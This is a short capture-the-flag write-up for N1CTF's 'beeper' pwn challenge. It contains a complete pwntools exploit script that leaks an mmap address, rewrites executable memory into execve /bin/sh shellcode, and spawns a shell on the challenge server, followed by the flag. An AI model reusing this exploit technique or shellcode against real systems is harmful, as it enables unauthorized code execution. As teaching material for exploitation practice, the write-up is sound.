Rating: 0

## === beeper (Pwn: 47 solved / 303 pts) ===

1. Avoid conversion of the input string by `111` byte input.
2. Login with the following password `"\x86\x13\x81\x09\x62\xff\x44\xd3\x3f\xcd\x19\xb0\xfb\x88\xfd\xae\x20\xdf"` .
3. Leak the address of the mmap reserved area by using Remove and Show function.
4. Change execution code to shell code by using `'m', 'u', 'h'` character.
5. Execute shell code by "3.Buy a cell phone".

```
from pwn import *

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

password = "\x86\x13\x81\x09\x62\xff\x44\xd3\x3f\xcd\x19\xb0\xfb\x88\xfd\xae\x20\xdf"
shellcode = "\x6a\x3b\x58\x48\x99\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
exec_code = "\x68\x6f\x64\x20\x01\x81\x34\x24\x01\x01\x01\x01\x48\xb8\x75\x79\x20\x61\x20\x70\x68\x6f\x50\x48\xb8\x61\x6e"

BINARY = './beeper'

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = remote('47.91.210.30', 23333)
else:
s = process(BINARY)

def Show(num):
s.recvuntil("choice>>")
s.sendline("1")
s.recvuntil("number:")
s.sendline(str(num))

def Remove(num):
s.recvuntil("choice>>")
s.sendline("2")
s.recvuntil("remove?")
s.sendline(str(num))

def Buy():
s.recvuntil("choice>>")
s.sendline("3")

def Logout():
s.recvuntil("choice>>")
s.sendline("4")

s.recvuntil("password:\n")
s.sendline(password.ljust(111, '1'))

Remove(2)
Remove(1)
Remove(0)
Show(1)

r = s.recv(0x24) # Leak mmap exec address
exec_addr = u64(r[0x1c:0x24])
print "exec_addr =", hex(exec_addr)

Logout()

s.recvuntil("password:\n")
buf = password.ljust(0x68, "A")
buf += p64(exec_addr)

l1 = len(shellcode)
for i in range(l1):
if shellcode[i] > exec_code[i]:
l2 = ord(shellcode[i]) - ord(exec_code[i])
for j in range(l2):
buf += "m"
else:
l2 = ord(exec_code[i]) - ord(shellcode[i])
for j in range(l2):
buf += "u"
buf += "h"

buf += "\x00"
s.sendline(buf)

Buy() # Exec shellcode

s.interactive()
```

```
N1CTF{5h3l1_c0d1n9_w17h_Hbf_1s_s0_e45y_233}
```